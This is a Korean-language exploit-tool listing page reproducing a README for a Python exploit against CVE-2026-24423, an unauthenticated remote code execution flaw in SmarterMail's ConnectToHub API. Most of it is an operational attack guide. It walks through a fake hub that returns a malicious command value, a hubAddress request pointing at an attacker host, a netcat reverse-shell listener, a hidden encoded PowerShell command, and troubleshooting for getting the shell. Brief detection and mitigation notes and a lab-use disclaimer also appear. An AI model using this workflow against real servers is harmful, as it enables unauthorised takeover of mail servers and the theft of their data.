Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
도구/GitHubGitHub/cyberalp0/smartermail-cve-2026-24423
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed TeamingRemote Access Tool
GitHubcyberalp0/smartermail-cve-2026-24423

SmarterMail-CVE-2026-24423

# CVE-2026-24423 익스플로잇 — SmarterMail의 ConnectToHub API에서 발생하는 치명적인 인증 없는 RCE. 빌드 9511 이전의 모든 버전에 영향을 미칩니다.

저장소 보기
17시간 2분 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

SmarterMail ConnectToHub RCE

CVE-2026-24423을 대상으로 하는 Python 기반 익스플로잇으로, SmarterTools SmarterMail의 ConnectToHub 기능에서 발생하는 인증되지 않은 원격 코드 실행(RCE) 취약점입니다.

사용 목적: 공인된 보안 테스트, CTF, Hack The Box 랩, 통제된 연구 환경에서만 사용하십시오.


목차

  • 개요
  • CVE 세부 정보
  • 영향받는 버전
  • 취약점 설명
  • 기술적 세부 사항
  • 익스플로잇 흐름
  • 요구 사항
  • 구성
  • 사용 방법
  • 예상 출력
  • 문제 해결
  • 스크린샷
  • 프로젝트 구조
  • 완화 조치
  • 참고 자료
  • 면책 조항

개요

CVE-2026-24423은 SmarterTools SmarterMail에 영향을 미치는 인증되지 않은 원격 코드 실행 취약점입니다.

이 취약점은 ConnectToHub 기능에 존재합니다. 인증되지 않은 공격자는 악의적인 hubAddress를 제공하여 SmarterMail 서버가 공격자가 제어하는 서버로 HTTP 요청을 보내도록 만들 수 있습니다.

악성 서버는 제어된 SystemMount.CommandMount 값을 포함하는 조작된 setup-initial-connection 응답으로 응답합니다.

취약한 SmarterMail 인스턴스는 이후 이 값을 운영 체제 명령으로 처리하여 SmarterMail 서비스의 보안 컨텍스트에서 임의 명령 실행을 허용합니다.

이 취약점은 CVSS 4.0 점수 9.3(치명적) 을 받았으며 CWE-306: 중요 기능에 대한 인증 누락으로 분류됩니다.


CVE 세부 정보

필드값
CVECVE-2026-24423
공급업체SmarterTools
제품SmarterMail
취약점인증되지 않은 원격 코드 실행
CWECWE-306
CVSS v4.09.3 치명적
CVSS v3.19.8 치명적
공격 벡터네트워크
인증없음
사용자 상호작용없음
복잡성낮음
공개일2026년 1월 23일
수정 빌드9511

공식 CVE 레코드는 이 문제를 ConnectToHub API 메서드를 통한 인증되지 않은 RCE로 설명합니다.


영향받는 버전

빌드 9511 이전의 SmarterMail 버전이 영향을 받습니다.

CVE 레코드는 영향을 받는 범위를 다음과 같이 지정합니다:

root@kitploit:~
SmarterMail < 100.0.9511

2026년 1월 15일에 출시된 빌드 9511에는 공급업체의 수정 사항이 포함되어 있습니다.

취약한 버전

root@kitploit:~
< 100.0.9511

수정된 버전

root@kitploit:~
>= 100.0.9511

취약점을 재현하기 전에 항상 정확한 설치 빌드를 확인하십시오.


취약점 설명

취약한 기능은 SmarterMail 시스템 관리 API를 통해 노출됩니다.

관련 작업은 다음과 같습니다:

root@kitploit:~
/api/v1/settings/sysadmin/connect-to-hub

엔드포인트는 hubAddress 매개변수를 허용합니다.

개념적으로 공격자는 다음을 제공할 수 있습니다:

root@kitploit:~
{
    "hubAddress": "http://ATTACKER_IP:8081",
    "oneTimePassword": "temporary-value",
    "nodeName": "DC"
}

SmarterMail은 그런 다음 제공된 허브 주소에 연결하여 다음을 요청합니다:

root@kitploit:~
/web/api/node-management/setup-initial-connection

공격자가 제어하는 서버는 악성 SystemMount 객체를 포함하는 JSON으로 응답합니다.

중요한 속성은 다음과 같습니다:

root@kitploit:~
"SystemMount": {
    "Enabled": true,
    "ReadOnly": false,
    "MountPath": "...",
    "CommandMount": "..."
}

CommandMount 값은 이후 취약한 애플리케이션에서 운영 체제 명령으로 사용됩니다.

이를 통해 공격자는 다음에서 전환할 수 있습니다:

root@kitploit:~
인증되지 않은 HTTP 요청

에서:

root@kitploit:~
원격 명령 실행

VulnCheck의 기술 분석에 따르면 공격자가 제어하는 hubAddress로 인해 SmarterMail이 공격자의 setup-initial-connection 엔드포인트를 요청하고 반환된 CommandMount가 임의 명령 실행을 제공할 수 있음을 확인합니다.


기술적 세부 사항

익스플로잇은 두 가지 구성 요소로 구성됩니다:

1. 가짜 SmarterMail 허브

Python 서버는 다음을 수신합니다:

root@kitploit:~
POST /web/api/node-management/setup-initial-connection

그리고 악성 SystemMount.CommandMount를 포함하는 조작된 JSON 응답을 반환합니다.

2. 리버스 셸 리스너

별도의 TCP 리스너가 대상에서 실행된 명령에 의해 시작된 연결을 수신합니다.

이 익스플로잇은 의도적으로 두 개의 별도 포트를 사용합니다.

root@kitploit:~
8081
└── 가짜 SmarterMail 허브

4455
└── 리버스 셸 리스너

익스플로잇 흐름

root@kitploit:~
flowchart LR

    A[공격자<br/>10.10.14.50]

    H[가짜 SmarterMail 허브<br/>TCP/8081]

    T[SmarterMail 대상<br/>10.129.57.86]

    C[CommandMount<br/>명령 실행]

    P[PowerShell]

    L[리버스 셸 리스너<br/>TCP/4455]

    A -->|ConnectToHub 트리거| T
    T -->|HTTP POST| H
    H -->|악성 JSON| T
    T -->|CommandMount| C
    C --> P
    P -->|리버스 TCP| L
    L --> A

연결 1 — 가짜 허브

root@kitploit:~
대상
   |
   | HTTP
   v
10.10.14.50:8081

연결 2 — 리버스 셸

root@kitploit:~
대상
   |
   | TCP
   v
10.10.14.50:4455

이 포트들은 서로 다른 목적을 가지며 혼동해서는 안 됩니다.


요구 사항

  • Python 3
  • Linux 공격자 머신
  • Hack The Box VPN 또는 이에 상응하는 공인된 네트워크
  • 대상에서 공격자까지의 네트워크 연결
  • Netcat
  • 취약한 SmarterMail 설치

익스플로잇은 Python 표준 라이브러리 모듈만 사용합니다:

root@kitploit:~
http.server
json
base64

외부 Python 패키지는 필요하지 않습니다.


구성

다음 변수를 편집하십시오:

root@kitploit:~
LHOST = "10.10.14.50"
LPORT = 4455
HUB_PORT = 8081

예제 HTB 환경의 경우:

root@kitploit:~
LHOST     = 10.10.14.50
LPORT     = 4455
HUB_PORT  = 8081

LHOST

LHOST는 대상이 도달할 수 있는 공격자의 IP 주소입니다.

Hack The Box의 경우 일반적으로 HTB VPN 인터페이스에 할당된 IP입니다:

root@kitploit:~
ip addr show tun0

예:

root@kitploit:~
tun0:
    inet 10.10.14.50

따라서:

root@kitploit:~
LHOST = "10.10.14.50"

LPORT

LPORT는 공격자가 리버스 연결을 수신하는 데 사용하는 TCP 포트입니다.

예:

root@kitploit:~
LPORT = 4455

HUB_PORT

HUB_PORT는 악성 SmarterMail 허브에서 사용하는 HTTP 포트입니다.

예:

root@kitploit:~
HUB_PORT = 8081

사용 방법

1. 저장소 복제

root@kitploit:~
git clone https://github.com/<username>/<repository>.git
cd <repository>

2. 익스플로잇 구성

편집:

root@kitploit:~
nano exploit.py

설정:

root@kitploit:~
LHOST = "10.10.14.50"
LPORT = 4455
HUB_PORT = 8081

3. 리버스 셸 리스너 시작

터미널을 엽니다:

root@kitploit:~
nc -lvnp 4455

예상 출력:

root@kitploit:~
Listening on 0.0.0.0 4455

이 터미널을 계속 열어 두십시오.


4. 악성 허브 시작

두 번째 터미널을 엽니다:

root@kitploit:~
python3 exploit.py

선택한 포트에 바인딩하는 데 상승된 권한이 필요한 경우:

root@kitploit:~
sudo python3 exploit.py

예상 출력:

root@kitploit:~
============================================================
 SmarterMail fake hub
============================================================
[+] LHOST:      10.10.14.50
[+] LPORT:      4455
[+] HUB:        10.10.14.50:8081

[+] Waiting for SmarterMail...
============================================================

5. ConnectToHub 트리거

취약한 SmarterMail 인스턴스에 적절한 요청을 보냅니다.

제공된 hubAddress는 악성 HTTP 서버를 가리켜야 합니다:

root@kitploit:~
{
    "hubAddress": "http://10.10.14.50:8081",
    "oneTimePassword": "tempst",
    "nodeName": "DC"
}

중요한 값은 다음과 같습니다:

root@kitploit:~
http://10.10.14.50:8081

리버스 셸 포트를 허브 포트로 사용하지 마십시오.


포트 구성 요약

용도IP포트
공격자 VPN10.10.14.50—
가짜 SmarterMail 허브10.10.14.508081
리버스 셸10.10.14.504455
HTB 대상10.129.57.86—

결과 흐름은 다음과 같습니다:

root@kitploit:~
hubAddress
    ↓
10.10.14.50:8081
    ↓
악성 CommandMount
    ↓
PowerShell
    ↓
10.10.14.50:4455

페이로드 인코딩

익스플로잇은 PowerShell 페이로드를 동적으로 생성합니다.

PowerShell의 -EncodedCommand 매개변수는 Base64 인코딩 전에 명령이 UTF-16LE로 인코딩되어야 합니다.

스크립트는 다음을 수행합니다:

root@kitploit:~
encoded = base64.b64encode(
    PS.encode("utf-16le")
).decode()

최종 명령은 다음과 같이 구성됩니다:

root@kitploit:~
powershell.exe -NoProfile -NonInteractive -WindowStyle Hidden -EncodedCommand <BASE64>

이렇게 하면 페이로드를 수동으로 인코딩할 필요가 없으며 일반적인 UTF-8/UTF-16LE 인코딩 오류를 방지할 수 있습니다.


예상 출력

대상이 악성 허브에 도달하면:

root@kitploit:~
[+] Received SmarterMail connection
[+] Path: /web/api/node-management/setup-initial-connection
[+] Body: ...
[+] Sending CommandMount payload
[+] Reverse shell -> 10.10.14.50:4455

리버스 셸 리스너는 이후 연결을 수신해야 합니다:

root@kitploit:~
Connection received on 10.129.57.86 XXXXX

연결되면 기본 검증을 수행할 수 있습니다:

root@kitploit:~
whoami
root@kitploit:~
hostname

문제 해결

가짜 허브가 연결을 수신하지 못함

서버가 수신 중인지 확인하십시오:

root@kitploit:~
ss -lntp | grep 8081

VPN 주소를 확인하십시오:

root@kitploit:~
ip addr show tun0

LHOST가 대상에서 도달 가능한 주소와 일치하는지 확인하십시오.


가짜 허브가 HTTP 200을 수신하지만 셸이 없음

HTTP 요청이 성공하면 첫 번째 단계가 작동 중임을 의미합니다:

root@kitploit:~
대상
  |
  | HTTP
  v
가짜 허브 :8081

반드시 두 번째 단계가 성공했음을 의미하지는 않습니다.

확인:

root@kitploit:~
ss -lntp | grep 4455

Netcat이 익스플로잇을 트리거하기 전에 시작되었는지 확인하십시오.

또한 다음을 확인하십시오:

root@kitploit:~
LHOST = 대상이 도달 가능한 공격자 IP
LPORT = 리스너 포트

Netcat이 셸 대신 HTTP 요청을 수신함

Netcat 내부에 다음이 표시되면:

root@kitploit:~
POST /web/api/node-management/setup-initial-connection

hubAddress를 리버스 셸 리스너로 지정한 것입니다.

잘못된 예:

root@kitploit:~
hubAddress = http://10.10.14.50:4455

올바른 예:

root@kitploit:~
hubAddress = http://10.10.14.50:8081

두 포트는 분리되어 있어야 합니다.


HTTP 400 응답

400 응답은 가짜 허브가 SmarterMail이 기대하는 구조를 반환하지 않을 때 발생할 수 있습니다.

응답에 다음이 포함되어 있는지 확인하십시오:

root@kitploit:~
"SystemMount": {
    "Enabled": true,
    "ReadOnly": false,
    "MountPath": "...",
    "CommandMount": "..."
}

또한 요청된 경로가 정확히 다음과 같은지 확인하십시오:

root@kitploit:~
/web/api/node-management/setup-initial-connection

공개 취약점 분석에서는 이 엔드포인트를 취약한 ConnectToHub 흐름의 일부로 식별합니다.


스크린샷

HTB 랩의 스크린샷을 여기에 추가하십시오.

1. 대상 열거

예:

root@kitploit:~
![Nmap Enumeration](https://raw.githubusercontent.com/cyberalp0/smartermail-cve-2026-24423/HEAD/screenshots/nmap.png)

제안된 스크린샷:

  • Nmap 결과
  • SmarterMail 서비스/버전
  • 관련 노출 포트

2. 악성 허브

root@kitploit:~
![Fake Hub](https://raw.githubusercontent.com/cyberalp0/smartermail-cve-2026-24423/HEAD/screenshots/fake-hub.png)

표시:

root@kitploit:~
[+] Received SmarterMail connection
[+] Sending CommandMount payload

3. 익스플로잇 트리거

root@kitploit:~
![Burp Request](https://raw.githubusercontent.com/cyberalp0/smartermail-cve-2026-24423/HEAD/screenshots/burp-request.png)

다음을 포함하는 요청 표시:

root@kitploit:~
{
    "hubAddress": "http://10.10.14.50:8081"
}

4. 리버스 셸

root@kitploit:~
![Reverse Shell](https://raw.githubusercontent.com/cyberalp0/smartermail-cve-2026-24423/HEAD/screenshots/reverse-shell.png)

표시:

root@kitploit:~
Connection received on 10.129.57.86

및 결과 명령 프롬프트.


프로젝트 구조

root@kitploit:~
smartermail-rce/
│
├── exploit.py
├── README.md
│
└── screenshots/
    ├── nmap.png
    ├── burp-request.png
    ├── fake-hub.png
    └── reverse-shell.png

탐지

익스플로잇의 잠재적 지표에는 다음에 대한 예기치 않은 요청이 포함됩니다:

root@kitploit:~
/api/v1/settings/sysadmin/connect-to-hub

및 SmarterMail 서버에서 이전에 알려지지 않은 HTTP 호스트로의 외부 연결.

관리자는 또한 애플리케이션, IIS/리버스 프록시 및 네트워크 로그에서 의심스러운 ConnectToHub 활동을 검토해야 합니다.

CVE-2026-24423은 CISA의 Known Exploited Vulnerabilities 카탈로그에 포함되어 있어 랩 환경 외부에서도 익스플로잇이 관찰되었음을 나타냅니다.


완화 조치

주요 해결 방법은 SmarterMail을 빌드 9511 이상으로 업그레이드하는 것입니다. 공급업체의 2026년 1월 15일 릴리스에서 취약점을 해결했습니다.

즉각적인 패치가 불가능한 경우 조직은 다음 사항도 추가로 고려해야 합니다:

  • SmarterMail 관리 API에 대한 액세스 제한.
  • 관리 엔드포인트에 대한 불필요한 외부 액세스 방지.
  • 네트워크 분할 적용.
  • SmarterMail 서버의 외부 연결 모니터링.
  • 의심스러운 ConnectToHub 요청에 대한 과거 로그 검토.
  • SmarterMail 서비스 계정의 예기치 않은 명령 실행 조사.

참고 자료

  • CVE 레코드: CVE-2026-24423
  • VulnCheck: SmarterMail ConnectToHub Unauthenticated RCE
  • CODE WHITE: 공개 취약점 목록
  • SmarterTools SmarterMail 릴리스 노트
  • CISA Known Exploited Vulnerabilities 카탈로그

면책 조항

이 프로젝트는 공인된 보안 연구 및 교육 목적으로만 제공됩니다.

소유하지 않았거나 테스트에 대한 명시적 권한이 없는 시스템에 이 익스플로잇을 사용하지 마십시오.

저자는 이 소프트웨어 사용으로 인한 오용, 손상, 데이터 손실, 무단 액세스 또는 기타 결과에 대해 책임을 지지 않습니다.

다음과 같은 통제된 환경에서만 사용하십시오:

  • Hack The Box
  • 캡처 더 플래그(Capture-the-Flag) 대회
  • 개인 연구실
  • 공인된 침투 테스트
  • 보안 연구 환경

크레딧

CVE-2026-24423은 다음에 의해 발견되었습니다:

  • Sina Kheirkhah
  • Piotr Bazydlo
  • Markus Wulftange
  • Cale Black

CVE는 2026년 1월 23일 VulnCheck에 의해 공개되었습니다.

도구 다운로드